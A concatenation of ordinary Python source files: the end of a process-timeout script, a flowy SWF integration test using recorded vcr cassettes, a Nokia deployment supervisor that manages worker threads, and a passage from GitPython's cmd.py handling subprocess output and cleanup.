tag_process.start()
tag_process.join(TIMEOUT_SECS)
bucket_process.join(TIMEOUT_SECS)
if tag_process.is_alive():
os.kill(tag_process.pid, signal.SIGKILL)
tag_process.join()
if bucket_process.is_alive():
os.kill(bucket_process.pid, signal.SIGKILL)
bucket_process.join()
if __name__ == "__main__":
main()
|
test_swf_integration.py
|
from __future__ import print_function
import os
import sys
import multiprocessing
import time
import json
import uuid
import functools
import gzip
import vcr
import vcr.cassette
import vcr.errors
import vcr.serialize
import vcr.request
from flowy import restart
from flowy import wait
from flowy import TaskError
from flowy import SWFActivityConfig
from flowy import SWFActivityWorker
from flowy import SWFClient
from flowy import SWFWorkflowConfig
from flowy import SWFWorkflowStarter
from flowy import SWFWorkflowWorker
VERSION = 2
HERE = os.path.dirname(os.path.realpath(__file__))
A_CASSETTE = os.path.join(HERE, 'cassettes/a.yml.gz')
W_CASSETTE = os.path.join(HERE, 'cassettes/w.yml.gz')
DOMAIN = 'FlowyIntegrationTest' # a domain where you have access
TASKLIST = 'tl'
IDENTITY = 'test'
RECORDING = False
exit_event = multiprocessing.Event()
wf_finished_event = multiprocessing.Event()
# Patch vcr to use gzip files
def load_cassette(cassette_path, serializer):
f = gzip.open(cassette_path, 'rb')
cassette_content = f.read()
cassette = vcr.serialize.deserialize(cassette_content, serializer)
f.close()
return cassette
def save_cassette(cassette_path, cassette_dict, serializer):
data = vcr.serialize.serialize(cassette_dict, serializer)
dirname, _ = os.path.split(cassette_path)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
f = gzip.open(cassette_path, 'wb')
f.write(data)
f.close()
vcr.cassette.load_cassette = load_cassette
vcr.cassette.save_cassette = save_cassette
# Patch requests_match in cassette for speed-up
def requests_match(r1, r2, matchers):
"""Skip logging and speed-up maching."""
return all(m(r1, r2) for m in matchers)
vcr.cassette.requests_match = requests_match
# Patch urlparse to speed it up on Python 3
try:
from functools import lru_cache
from urllib.parse import urlparse
vcr.request.urlparse = lru_cache(maxsize=None)(urlparse)
except ImportError:
pass
# patch uuid4 for consistent keys
def fake_uuid4():
x = 0
while 1:
yield 'fakeuuid-%s-' % x
x += 1
uuid.uuid4 = functools.partial(next, fake_uuid4())
def break_loop(self):
return exit_event.is_set()
class TestSWFWorkflowWorker(SWFWorkflowWorker):
break_loop = break_loop
class TestSWFActivityWorker(SWFActivityWorker):
break_loop = break_loop
class BaseWorkflow(object):
def __call__(self, *args, **kwargs):
r = self.call(*args, **kwargs)
wait(r)
wf_finished_event.set()
return r
def call(self, *args, **kwargs):
raise NotImplementedError
a_conf = SWFActivityConfig(default_task_list=TASKLIST,
default_schedule_to_start=30,
default_schedule_to_close=60,
default_start_to_close=15,
default_heartbeat=10)
@a_conf(version=VERSION)
def tactivity(hb, a=None, b=None, sleep=None, heartbeat=False, err=None):
result = None
if a is not None and b is not None:
result = a + b
elif a is not None:
result = a * a
if sleep is not None and RECORDING:
time.sleep(sleep)
if heartbeat:
hb()
if err is not None:
raise RuntimeError(err)
return result
empty_conf = SWFWorkflowConfig(default_task_list=TASKLIST,
default_decision_duration=10,
default_workflow_duration=20,
default_child_policy='TERMINATE', )
empty_conf.conf_activity('activity', VERSION, 'tactivity')
@empty_conf(version=VERSION)
class TWorkflow(object):
def __init__(self, activity):
pass
def __call__(self, a=None, b=None, sleep=None, heartbeat=False, err=None):
dummy_heartbeat = lambda: True
return tactivity(dummy_heartbeat, a, b, sleep, heartbeat, err)
conf_use_activities = SWFWorkflowConfig(default_task_list=TASKLIST,
default_decision_duration=10,
default_workflow_duration=60,
default_child_policy='TERMINATE')
conf_use_activities.conf_activity('task', VERSION, 'tactivity')
conf_use_activities.conf_activity('short_task', VERSION, 'tactivity',
schedule_to_close=1,
retry=(0, ))
conf_use_activities.conf_activity('delayed_task', VERSION, 'tactivity',
retry=(3, ))
conf_use_activities.conf_activity('non_existing_task', 1, 'xxx')
conf_use_workflow = SWFWorkflowConfig(default_task_list=TASKLIST,
default_decision_duration=10,
default_workflow_duration=60,
default_child_policy='TERMINATE')
conf_use_workflow.conf_workflow('task', VERSION, 'TWorkflow')
conf_use_workflow.conf_workflow('short_task', VERSION, 'TWorkflow',
workflow_duration=1,
retry=(0, ))
conf_use_workflow.conf_workflow('delayed_task', VERSION, 'TWorkflow',
retry=(3, ))
conf_use_workflow.conf_workflow('non_existing_task', 1, 'xxx')
@conf_use_activities(version=VERSION)
@conf_use_workflow(version=VERSION, name='TestWorkflowW')
class TestWorkflow(BaseWorkflow):
def __init__(self, task, short_task, delayed_task, non_existing_task):
self.task = task
self.short_task = short_task
self.delayed_task = delayed_task
self.non_existing_task = non_existing_task
def call(self):
tasks = [self.task(10),
self.task(err=u'Error!'),
self.task(heartbeat=True),
self.short_task(sleep=3),
self.delayed_task(20),
self.non_existing_task(), ]
last = self.task(1, 1) # Make the history longer, to have pages
for _ in range(20):
last = self.task(last, 1)
tasks.append(last)
for t in tasks:
try:
wait(t)
except TaskError:
pass
@empty_conf(version=VERSION)
class RestartWorkflow(BaseWorkflow):
def __init__(self, activity):
pass
def call(self, should_restart=True):
if should_restart:
return restart(should_restart=False)
return 1
@empty_conf(version=VERSION)
class ExitWorkflow(object):
def __init__(self, activity):
exit_event.set()
wait(activity()) # wake the activity thread
def __call__(self):
pass
wworker = TestSWFWorkflowWorker()
wworker.scan(package=sys.modules[__name__])
aworker = TestSWFActivityWorker()
aworker.scan(package=sys.modules[__name__])
body_cache = {}
def body_as_dict(r1, r2):
if r1 not in body_cache:
r1b = r1.body if isinstance(r1.body, str) else r1.body.decode('utf-8')
body_cache[r1] = json.loads(r1b)
if r2 not in body_cache:
r2b = r2.body if isinstance(r2.body, str) else r2.body.decode('utf-8')
body_cache[r2] = json.loads(r2b)
return body_cache[r1] == body_cache[r2]
def escaped_headers(r1, r2):
    try:
        from urllib.parse import unquote  # Python 3
    except ImportError:
        from urllib import unquote  # Python 2
    r1h = dict((h, unquote(v)) for h, v in r1.headers.items())
    r2h = dict((h, unquote(v)) for h, v in r2.headers.items())
    return r1h == r2h
vcr.default_vcr.register_matcher('dict_body', body_as_dict)
vcr.default_vcr.register_matcher('esc_headers', escaped_headers)
cassette_args = {
'match_on': ['dict_body', 'esc_headers', 'query', 'method', 'uri', 'host',
'port', 'path'],
'filter_headers': ['authorization', 'x-amz-date', 'content-length',
'user-agent']
}
def test_activity_integration():
with vcr.use_cassette(A_CASSETTE,
record_mode='none', **cassette_args) as cass:
try:
cl = SWFClient(kwargs={'aws_access_key_id': 'x',
'aws_secret_access_key': 'x',
'region_name': 'us-east-1'})
aworker.run_forever(DOMAIN, TASKLIST,
identity=IDENTITY,
swf_client=cl,
setup_log=False)
except vcr.errors.CannotOverwriteExistingCassetteException:
pass
assert cass.all_played
def test_workflow_integration():
with vcr.use_cassette(W_CASSETTE,
record_mode='none', **cassette_args) as cass:
try:
cl = SWFClient(kwargs={'aws_access_key_id': 'x',
'aws_secret_access_key': 'x',
'region_name': 'us-east-1'})
wworker.run_forever(DOMAIN, TASKLIST,
identity=IDENTITY,
swf_client=cl,
setup_log=False)
except vcr.errors.CannotOverwriteExistingCassetteException:
pass
assert cass.all_played
def start_activity_worker():
with vcr.use_cassette(A_CASSETTE,
record_mode='all', **cassette_args) as cass:
try:
aworker.run_forever(DOMAIN, TASKLIST, identity=IDENTITY)
except vcr.errors.CannotOverwriteExistingCassetteException:
pass
def start_workflow_worker():
with vcr.use_cassette(W_CASSETTE,
record_mode='all', **cassette_args) as cass:
try:
wworker.run_forever(DOMAIN, TASKLIST, identity=IDENTITY)
except vcr.errors.CannotOverwriteExistingCassetteException:
pass
if __name__ == '__main__':
RECORDING = True
try:
os.remove(A_CASSETTE)
except:
pass
try:
os.remove(W_CASSETTE)
except:
pass
a_worker = multiprocessing.Process(target=start_activity_worker)
w_worker = multiprocessing.Process(target=start_workflow_worker)
a_worker.start()
w_worker.start()
time.sleep(5) # Wait for registration
wfs = ['TestWorkflow', 'TestWorkflowW', 'RestartWorkflow']
for wf in wfs:
print('Starting', wf)
SWFWorkflowStarter(DOMAIN, wf, VERSION)()
wf_finished_event.wait()
wf_finished_event.clear()
# Must be the last one
print('Prepare to exit')
SWFWorkflowStarter(DOMAIN, 'ExitWorkflow', VERSION)()
a_worker.join()
w_worker.join()
|
supervisor.py
|
# Copyright (C) 2016 Nokia Corporation and/or its subsidiary(-ies).
import ConfigParser
from functools import wraps
import importlib
from logging import getLogger
import os
import threading
import time
import beanstalkc
from . import api
from . import execution, mail, notification, websocket, database
from .instancehealth import InstanceHealth
from .log import configure_logging
from .checkreleases import CheckReleasesWorker
from .cleaner import CleanerWorker
from .worker import DeployerWorker, AsyncFetchWorker
from .inventory import InventoryUpdateChecker, AsyncInventoryWorker
logger = getLogger(__name__)
def _import_class(class_path):
parts = class_path.split(".")
module = importlib.import_module(".".join(parts[:-1]))
return getattr(module, parts[-1])
class WorkerSupervisor(object):
"""Spawns and manages all the deployer workers.
A worker is a class with the following interface:
* the `start` method must be a blocking method, and will be called in a new thread.
If this method exits by raising an exception, it will be called again.
* the `stop` method can be called from any thread and must cause the `start` method to return.
* the `name` property describes the worker
"""
# Main entry point for the deployer
def __init__(self, config_path):
self.threads = []
self._health = InstanceHealth()
self._running = True
self.lock = threading.Lock()
configure_logging()
logger.info("Using configuration file at {}".format(config_path))
if not os.path.isfile(config_path):
raise ValueError("Can not read the configuration file at {}".format(config_path))
config = ConfigParser.ConfigParser()
config.read(config_path)
self.config_path = config_path
database.init_db(config.get("database", "connection"))
workers = self._build_workers(config)
self._spawn_workers(workers)
t = threading.Thread(name="supervisor", target=self._monitor)
t.daemon = True # we can forcefully kill this thread
t.start()
def _restart_function_on_exception(self, f, context):
"""If the callable f raises an exception, log the exception then call f again.
This function will not propagate exceptions, and will return only when f returns without raising
an exception.
This is useful to ensure that a worker thread does not die.
        The function will not be called again if the deployer is exiting.
Args:
f (callable)
context (str): will be displayed in log messages if an exception occurs
"""
@wraps(f)
def wrapped(*args, **kwargs):
while self._running:
try:
out = f(*args, **kwargs)
if self._running:
logger.error("A worker main function returned while the deployer is still running, "
"this is a bug ({}).".format(context))
return out
except Exception:
logger.exception("Unhandled exception ({}), will restart the worker.".format(context))
time.sleep(30)
return wrapped
def _build_notifiers(self, ws_worker, mail_sender, notify_mails, carbon_host, carbon_port, other_deployer_urls, deployer_username, deployer_token, provider):
mail = notification.MailNotifier(mail_sender, notify_mails)
websocket = notification.WebSocketNotifier(ws_worker)
graphite = notification.GraphiteNotifier(carbon_host, carbon_port)
remote = notification.RemoteDeployerNotifier(other_deployer_urls, deployer_username, deployer_token)
more_notifiers = provider.build_notifiers()
return notification.NotifierCollection(mail, websocket, graphite, remote, *more_notifiers), websocket
def _build_integration_module(self, config):
provider_class = _import_class(config.get('integration', 'provider'))
return provider_class(config)
def _build_workers(self, config):
provider = self._build_integration_module(config)
workers = []
general_config = execution.GeneralConfig(
base_repos_path=config.get("general", "local_repo_path"),
haproxy_user=config.get("general", "haproxy_user"),
haproxy_password=config.get("general", "haproxy_pass"),
notify_mails=config.get('general', "notify_mails").split(","),
mail_sender=config.get('mail', 'sender')
)
notify_mails = [s.strip() for s in config.get('general', 'notify_mails').split(",")]
carbon_host = config.get('general', 'carbon_host')
carbon_port = config.getint('general', 'carbon_port')
deployers_urls = [s.strip() for s in config.get('cluster', 'deployers_urls').split(",")]
other_deployers_urls = list(deployers_urls)
other_deployers_urls.remove(config.get('cluster', 'this_deployer_url'))
deployer_username = config.get('cluster', 'this_deployer_username')
deployer_token = config.get('cluster', 'this_deployer_token')
mail_sender = config.get('mail', 'sender')
ws_worker = websocket.WebSocketWorker(port=config.getint('general', 'websocket_port'))
workers.append(ws_worker)
self.notifier, websocket_notifier = self._build_notifiers(
ws_worker, mail_sender, notify_mails, carbon_host, carbon_port, other_deployers_urls, deployer_username, deployer_token, provider
)
for i in range(5):
conn = beanstalkc.Connection(host=config.get('general', 'beanstalk_host'), port=11300)
deployer_worker = DeployerWorker(conn, general_config, self.notifier, provider.detect_artifact, str(i))
workers.append(deployer_worker)
mail_worker = mail.MailWorker(config.get("mail", "mta"))
workers.append(mail_worker)
# START FEATURE FLAG: inventory
self.inventory_host = None
self.inventory_auth = None
if config.has_section('inventory') and config.getboolean('inventory', 'activate_updater') is True:
self.inventory_host = provider.inventory_host()
if config.getboolean('inventory', 'activate_checker'):
if config.has_option('inventory', 'update_frequency'):
inventory_frequency = config.getint('inventory', 'update_frequency')
else:
inventory_frequency = 60
inventory_update_checker = InventoryUpdateChecker(self.inventory_host, inventory_frequency)
workers.append(inventory_update_checker)
async_inv_updater = AsyncInventoryWorker(self.inventory_host)
workers.append(async_inv_updater)
self.inventory_auth = provider.inventory_authenticator()
# END FEATURE FLAG
api_worker = api.ApiWorker(self.config_path, config, self.notifier, websocket_notifier, provider.authenticator(), self._health, self.inventory_auth, self.inventory_host)
workers.append(api_worker)
if config.has_option("general", "check_releases_frequency"):
frequency = config.getint("general", "check_releases_frequency")
if frequency > 0:
ignore_envs = config.get("general", "check_releases_ignore_environments").split(",") if config.has_option("general", "check_releases_ignore_environments") else []
check_releases_workers = CheckReleasesWorker(frequency, ignore_envs, self._health)
workers.append(check_releases_workers)
async_fetch_workers = [
AsyncFetchWorker(
config,
self.notifier,
"async-fetch-worker-{}".format(id_worker))
for id_worker in range(1, 4)
]
for worker in async_fetch_workers:
workers.append(worker)
workers.append(CleanerWorker(general_config.base_repos_path))
return workers
def run(self):
"""Blocks until exit() is called (from another thread)"""
try:
while self._running:
time.sleep(1)
finally:
self._exit()
def _spawn_workers(self, workers):
for w in workers:
self._start_worker(w)
self.notifier.dispatch(notification.Notification.deployer_started())
def _start_worker(self, worker, *args, **kwargs):
t = threading.Thread(name=worker.name,
target=self._restart_function_on_exception(
worker.start,
context="in worker {}".format(worker.name)
),
args=args,
kwargs=kwargs)
self.threads.append((t, worker))
t.start()
logger.debug("Started worker {} (tid {})".format(worker.name, t.ident))
def exit(self):
logger.info("Stopping the deployer (this can take a few seconds)...")
self._running = False
def _exit(self):
with self.lock:
self._running = False
timeout = 10
for t, worker in self.threads:
try:
logger.debug("Stopping worker {} (tid {})".format(worker.name, t.ident))
worker.stop()
except Exception:
logger.exception("Error when stopping the worker {}:".format(worker.name))
for t, worker in self.threads:
logger.debug("Waiting for the worker {} to exit (tid {})...".format(worker.name, t.ident))
t.join(timeout)
still_alive = [t for t, _ in self.threads if t.isAlive()]
if len(still_alive) > 0: # this was not a triumph
for t in still_alive:
logger.error("The thread '{}' is still alive after {} seconds (maybe because of a deployment in progress?). If you want to force the exit, send SIGKILL to the deployer process.".format(t.name, timeout))
else:
logger.info("All workers gracefully terminated.")
self.threads = []
def _monitor(self):
while self._running:
with self.lock:
for t, _ in self.threads:
if not t.isAlive():
self._health.add_degraded("workers", "a deployer thread died (see logs for details)")
logger.error(
"The thread {} (tid {}) died. You should examine the logs to find out "
"what went wrong, and probably restart the deployer."
.format(t.name, t.ident))
time.sleep(20)
|
cmd.py
|
# cmd.py
# Copyright (C) 2008, 2009 Michael Trier (mtrier@gmail.com) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
from __future__ import annotations
from contextlib import contextmanager
import io
import logging
import os
import signal
from subprocess import call, Popen, PIPE, DEVNULL
import subprocess
import threading
from textwrap import dedent
from git.compat import (
defenc,
force_bytes,
safe_decode,
is_posix,
is_win,
)
from git.exc import CommandError
from git.util import is_cygwin_git, cygpath, expand_path, remove_password_if_present
from .exc import GitCommandError, GitCommandNotFound
from .util import (
LazyMixin,
stream_copy,
)
# typing ---------------------------------------------------------------------------
from typing import (
Any,
AnyStr,
BinaryIO,
Callable,
Dict,
IO,
Iterator,
List,
Mapping,
Sequence,
TYPE_CHECKING,
TextIO,
Tuple,
Union,
cast,
overload,
)
from git.types import PathLike, Literal, TBD
if TYPE_CHECKING:
from git.repo.base import Repo
from git.diff import DiffIndex
# ---------------------------------------------------------------------------------
execute_kwargs = {
"istream",
"with_extended_output",
"with_exceptions",
"as_process",
"stdout_as_string",
"output_stream",
"with_stdout",
"kill_after_timeout",
"universal_newlines",
"shell",
"env",
"max_chunk_size",
"strip_newline_in_stdout",
}
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
__all__ = ("Git",)
# ==============================================================================
## @name Utilities
# ------------------------------------------------------------------------------
# Documentation
## @{
def handle_process_output(
process: "Git.AutoInterrupt" | Popen,
stdout_handler: Union[
None,
Callable[[AnyStr], None],
Callable[[List[AnyStr]], None],
Callable[[bytes, "Repo", "DiffIndex"], None],
],
stderr_handler: Union[None, Callable[[AnyStr], None], Callable[[List[AnyStr]], None]],
finalizer: Union[None, Callable[[Union[subprocess.Popen, "Git.AutoInterrupt"]], None]] = None,
decode_streams: bool = True,
kill_after_timeout: Union[None, float] = None,
) -> None:
"""Registers for notifications to learn that process output is ready to read, and dispatches lines to
the respective line handlers.
This function returns once the finalizer returns
:return: result of finalizer
:param process: subprocess.Popen instance
:param stdout_handler: f(stdout_line_string), or None
:param stderr_handler: f(stderr_line_string), or None
:param finalizer: f(proc) - wait for proc to finish
:param decode_streams:
Assume stdout/stderr streams are binary and decode them before pushing \
their contents to handlers.
        Set it to False if `universal_newlines == True` (then streams are in text-mode)
or if decoding must happen later (i.e. for Diffs).
:param kill_after_timeout:
float or None, Default = None
To specify a timeout in seconds for the git command, after which the process
should be killed.
"""
# Use 2 "pump" threads and wait for both to finish.
def pump_stream(
cmdline: List[str],
name: str,
stream: Union[BinaryIO, TextIO],
is_decode: bool,
handler: Union[None, Callable[[Union[bytes, str]], None]],
) -> None:
try:
for line in stream:
if handler:
if is_decode:
assert isinstance(line, bytes)
line_str = line.decode(defenc)
handler(line_str)
else:
handler(line)
except Exception as ex:
log.error(f"Pumping {name!r} of cmd({remove_password_if_present(cmdline)}) failed due to: {ex!r}")
if "I/O operation on closed file" not in str(ex):
# Only reraise if the error was not due to the stream closing
raise CommandError([f"<{name}-pump>"] + remove_password_if_present(cmdline), ex) from ex
finally:
stream.close()
if hasattr(process, "proc"):
process = cast("Git.AutoInterrupt", process)
cmdline: str | Tuple[str, ...] | List[str] = getattr(process.proc, "args", "")
p_stdout = process.proc.stdout if process.proc else None
p_stderr = process.proc.stderr if process.proc else None
else:
process = cast(Popen, process)
cmdline = getattr(process, "args", "")
p_stdout = process.stdout
p_stderr = process.stderr
if not isinstance(cmdline, (tuple, list)):
cmdline = cmdline.split()
pumps: List[Tuple[str, IO, Callable[..., None] | None]] = []
if p_stdout:
pumps.append(("stdout", p_stdout, stdout_handler))
if p_stderr:
pumps.append(("stderr", p_stderr, stderr_handler))
threads: List[threading.Thread] = []
for name, stream, handler in pumps:
t = threading.Thread(target=pump_stream, args=(cmdline, name, stream, decode_streams, handler))
t.daemon = True
t.start()
threads.append(t)
## FIXME: Why Join?? Will block if `stdin` needs feeding...
#
for t in threads:
t.join(timeout=kill_after_timeout)
if t.is_alive():
if isinstance(process, Git.AutoInterrupt):
process._terminate()
else: # Don't want to deal with the other case
raise RuntimeError(
"Thread join() timed out in cmd.handle_process_output()."
f" kill_after_timeout={kill_after_timeout} seconds"
)
if stderr_handler:
error_str: Union[str, bytes] = (
"error: process killed because it timed out." f" kill_after_timeout={kill_after_timeout} seconds"
)
if not decode_streams and isinstance(p_stderr, BinaryIO):
# Assume stderr_handler needs binary input
error_str = cast(str, error_str)
error_str = error_str.encode()
# We ignore typing on the next line because mypy does not like
# the way we inferred that stderr takes str or bytes
stderr_handler(error_str) # type: ignore
if finalizer:
return finalizer(process)
else:
return None
def dashify(string: str) -> str:
return string.replace("_", "-")
def slots_to_dict(self: object, exclude: Sequence[str] = ()) -> Dict[str, Any]:
return {s: getattr(self, s) for s in self.__slots__ if s not in exclude}
def dict_to_slots_and__excluded_are_none(self: object, d: Mapping[str, Any], excluded: Sequence[str] = ()) -> None:
for k, v in d.items():
setattr(self, k, v)
for k in excluded:
setattr(self, k, None)
## -- End Utilities -- @}
# value of Windows process creation flag taken from MSDN
CREATE_NO_WINDOW = 0x08000000
## CREATE_NEW_PROCESS_GROUP is needed to allow killing it afterwards,
# see https://docs.python.org/3/library/subprocess.html#subprocess.Popen.send_signal
PROC_CREATIONFLAGS = (
CREATE_NO_WINDOW | subprocess.CREATE_NEW_PROCESS_GROUP if is_win else 0 # type: ignore[attr-defined]
) # mypy error if not windows
class Git(LazyMixin):
"""
The Git class manages communication with the Git binary.
It provides a convenient interface to calling the Git binary, such as in::
g = Git( git_dir )
g.init() # calls 'git init' program
rval = g.ls_files() # calls 'git ls-files' program
``Debugging``
        Set the GIT_PYTHON_TRACE environment variable to print each invocation
of the command to stdout.
Set its value to 'full' to see details about the returned values.
"""
__slots__ = (
"_working_dir",
"cat_file_all",
"cat_file_header",
"_version_info",
"_git_options",
"_persistent_git_options",
"_environment",
)
_excluded_ = ("cat_file_all", "cat_file_header", "_version_info")
def __getstate__(self) -> Dict[str, Any]:
return slots_to_dict(self, exclude=self._excluded_)
def __setstate__(self, d: Dict[str, Any]) -> None:
dict_to_slots_and__excluded_are_none(self, d, excluded=self._excluded_)
# CONFIGURATION
git_exec_name = "git" # default that should work on linux and windows
# Enables debugging of GitPython's git commands
GIT_PYTHON_TRACE = os.environ.get("GIT_PYTHON_TRACE", False)
# If True, a shell will be used when executing git commands.
# This should only be desirable on Windows, see https://github.com/gitpython-developers/GitPython/pull/126
# and check `git/test_repo.py:TestRepo.test_untracked_files()` TC for an example where it is required.
# Override this value using `Git.USE_SHELL = True`
USE_SHELL = False
# Provide the full path to the git executable. Otherwise it assumes git is in the path
_git_exec_env_var = "GIT_PYTHON_GIT_EXECUTABLE"
_refresh_env_var = "GIT_PYTHON_REFRESH"
GIT_PYTHON_GIT_EXECUTABLE = None
# note that the git executable is actually found during the refresh step in
# the top level __init__
@classmethod
def refresh(cls, path: Union[None, PathLike] = None) -> bool:
"""This gets called by the refresh function (see the top level
__init__).
"""
# discern which path to refresh with
if path is not None:
new_git = os.path.expanduser(path)
new_git = os.path.abspath(new_git)
else:
new_git = os.environ.get(cls._git_exec_env_var, cls.git_exec_name)
# keep track of the old and new git executable path
old_git = cls.GIT_PYTHON_GIT_EXECUTABLE
cls.GIT_PYTHON_GIT_EXECUTABLE = new_git
# test if the new git executable path is valid
# - a GitCommandNotFound error is spawned by ourselves
# - a PermissionError is spawned if the git executable provided
# cannot be executed for whatever reason
has_git = False
try:
cls().version()
has_git = True
except (GitCommandNotFound, PermissionError):
pass
# warn or raise exception if test failed
if not has_git:
err = (
dedent(
"""\
Bad git executable.
The git executable must be specified in one of the following ways:
- be included in your $PATH
- be set via $%s
- explicitly set via git.refresh()
"""
)
% cls._git_exec_env_var
)
# revert to whatever the old_git was
cls.GIT_PYTHON_GIT_EXECUTABLE = old_git
if old_git is None:
# on the first refresh (when GIT_PYTHON_GIT_EXECUTABLE is
# None) we only are quiet, warn, or error depending on the
# GIT_PYTHON_REFRESH value
# determine what the user wants to happen during the initial
# refresh we expect GIT_PYTHON_REFRESH to either be unset or
# be one of the following values:
# 0|q|quiet|s|silence
# 1|w|warn|warning
# 2|r|raise|e|error
mode = os.environ.get(cls._refresh_env_var, "raise").lower()
quiet = ["quiet", "q", "silence", "s", "none", "n", "0"]
warn = ["warn", "w", "warning", "1"]
error = ["error", "e", "raise", "r", "2"]
if mode in quiet:
pass
elif mode in warn or mode in error:
err = (
dedent(
"""\
%s
All git commands will error until this is rectified.
This initial warning can be silenced or aggravated in the future by setting the
$%s environment variable. Use one of the following values:
- %s: for no warning or exception
- %s: for a printed warning
- %s: for a raised exception
Example:
export %s=%s
"""
)
% (
err,
cls._refresh_env_var,
"|".join(quiet),
"|".join(warn),
"|".join(error),
cls._refresh_env_var,
quiet[0],
)
)
if mode in warn:
print("WARNING: %s" % err)
else:
raise ImportError(err)
else:
err = (
dedent(
"""\
%s environment variable has been set but it has been set with an invalid value.
Use only the following values:
- %s: for no warning or exception
- %s: for a printed warning
- %s: for a raised exception
"""
)
% (
cls._refresh_env_var,
"|".join(quiet),
"|".join(warn),
"|".join(error),
)
)
raise ImportError(err)
# we get here if this was the init refresh and the refresh mode
# was not error, go ahead and set the GIT_PYTHON_GIT_EXECUTABLE
# such that we discern the difference between a first import
# and a second import
cls.GIT_PYTHON_GIT_EXECUTABLE = cls.git_exec_name
else:
# after the first refresh (when GIT_PYTHON_GIT_EXECUTABLE
# is no longer None) we raise an exception
raise GitCommandNotFound("git", err)
return has_git
@classmethod
def is_cygwin(cls) -> bool:
return is_cygwin_git(cls.GIT_PYTHON_GIT_EXECUTABLE)
@overload
@classmethod
def polish_url(cls, url: str, is_cygwin: Literal[False] = ...) -> str:
...
@overload
@classmethod
def polish_url(cls, url: str, is_cygwin: Union[None, bool] = None) -> str:
...
@classmethod
def polish_url(cls, url: str, is_cygwin: Union[None, bool] = None) -> PathLike:
if is_cygwin is None:
is_cygwin = cls.is_cygwin()
if is_cygwin:
url = cygpath(url)
else:
"""Remove any backslahes from urls to be written in config files.
Windows might create config-files containing paths with backslashed,
but git stops liking them as it will escape the backslashes.
Hence we undo the escaping just to be sure.
"""
url = os.path.expandvars(url)
if url.startswith("~"):
url = os.path.expanduser(url)
url = url.replace("\\\\", "\\").replace("\\", "/")
return url
class AutoInterrupt(object):
"""Kill/Interrupt the stored process instance once this instance goes out of scope. It is
used to prevent processes piling up in case iterators stop reading.
Besides all attributes are wired through to the contained process object.
The wait method was overridden to perform automatic status code checking
and possibly raise."""
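        # Instances are created by Git.execute(..., as_process=True), which wraps the
        # spawned subprocess.Popen in this class before returning it.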
__slots__ = ("proc", "args", "status")
# If this is non-zero it will override any status code during
# _terminate, used to prevent race conditions in testing
_status_code_if_terminate: int = 0
def __init__(self, proc: Union[None, subprocess.Popen], args: Any) -> None:
self.proc = proc
self.args = args
self.status: Union[int, None] = None
def _terminate(self) -> None:
"""Terminate the underlying process"""
if self.proc is None:
return
proc = self.proc
self.proc = None
if proc.stdin:
proc.stdin.close()
if proc.stdout:
proc.stdout.close()
if proc.stderr:
proc.stderr.close()
# did the process finish already so we have a return code ?
try:
if proc.poll() is not None:
self.status = self._status_code_if_terminate or proc.poll()
return None
except OSError as ex:
log.info("Ignored error after process had died: %r", ex)
# can be that nothing really exists anymore ...
if os is None or getattr(os, "kill", None) is None:
return None
# try to kill it
try:
proc.terminate()
status = proc.wait() # ensure process goes away
self.status = self._status_code_if_terminate or status
except OSError as ex:
log.info("Ignored error after process had died: %r", ex)
except AttributeError:
# try windows
# for some reason, providing None for stdout/stderr still prints something. This is why
                # we simply use the shell and redirect to nul. It's slower than CreateProcess; the question
                # is whether we really want to see all these messages. It's annoying no matter what.
if is_win:
call(
("TASKKILL /F /T /PID %s 2>nul 1>nul" % str(proc.pid)),
shell=True,
)
# END exception handling
def __del__(self) -> None:
self._terminate()
def __getattr__(self, attr: str) -> Any:
return getattr(self.proc, attr)
# TODO: Bad choice to mimic `proc.wait()` but with different args.
def wait(self, stderr: Union[None, str, bytes] = b"") -> int:
"""Wait for the process and return its status code.
:param stderr: Previously read value of stderr, in case stderr is already closed.
:warn: may deadlock if output or error pipes are used and not handled separately.
:raise GitCommandError: if the return status is not 0"""
            if stderr is None:
                stderr = b""
            stderr_b = force_bytes(data=stderr, encoding="utf-8")
status: Union[int, None]
if self.proc is not None:
status = self.proc.wait()
p_stderr = self.proc.stderr
else: # Assume the underlying proc was killed earlier or never existed
status = self.status
p_stderr = None
def read_all_from_possibly_closed_stream(stream: Union[IO[bytes], None]) -> bytes:
if stream:
try:
return stderr_b + force_bytes(stream.read())
except ValueError:
return stderr_b or b""
else:
return stderr_b or b""
# END status handling
if status != 0:
errstr = read_all_from_possibly_closed_stream(p_stderr)
log.debug("AutoInterrupt wait stderr: %r" % (errstr,))
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
return status
# END auto interrupt
class CatFileContentStream(object):
"""Object representing a sized read-only stream returning the contents of
an object.
It behaves like a stream, but counts the data read and simulates an empty
stream once our sized content region is empty.
        If not all data is read to the end of the object's lifetime, we read the
rest to assure the underlying stream continues to work"""
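        # Such streams are handed out by Git.stream_object_data(), which returns
        # (hexsha, type_string, size_as_int, stream) for a given ref.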
__slots__: Tuple[str, ...] = ("_stream", "_nbr", "_size")
def __init__(self, size: int, stream: IO[bytes]) -> None:
self._stream = stream
self._size = size
self._nbr = 0 # num bytes read
# special case: if the object is empty, has null bytes, get the
# final newline right away.
if size == 0:
stream.read(1)
# END handle empty streams
def read(self, size: int = -1) -> bytes:
bytes_left = self._size - self._nbr
if bytes_left == 0:
return b""
if size > -1:
# assure we don't try to read past our limit
size = min(bytes_left, size)
else:
                # they try to read all, make sure it's not more than what remains
size = bytes_left
# END check early depletion
data = self._stream.read(size)
self._nbr += len(data)
# check for depletion, read our final byte to make the stream usable by others
if self._size - self._nbr == 0:
self._stream.read(1) # final newline
# END finish reading
return data
def readline(self, size: int = -1) -> bytes:
if self._nbr == self._size:
return b""
# clamp size to lowest allowed value
bytes_left = self._size - self._nbr
if size > -1:
size = min(bytes_left, size)
else:
size = bytes_left
# END handle size
data = self._stream.readline(size)
self._nbr += len(data)
# handle final byte
if self._size - self._nbr == 0:
self._stream.read(1)
# END finish reading
return data
def readlines(self, size: int = -1) -> List[bytes]:
if self._nbr == self._size:
return []
# leave all additional logic to our readline method, we just check the size
out = []
nbr = 0
while True:
line = self.readline()
if not line:
break
out.append(line)
if size > -1:
nbr += len(line)
if nbr > size:
break
# END handle size constraint
# END readline loop
return out
# skipcq: PYL-E0301
def __iter__(self) -> "Git.CatFileContentStream":
return self
        def __next__(self) -> bytes:
            return self.next()
def next(self) -> bytes:
line = self.readline()
if not line:
raise StopIteration
return line
def __del__(self) -> None:
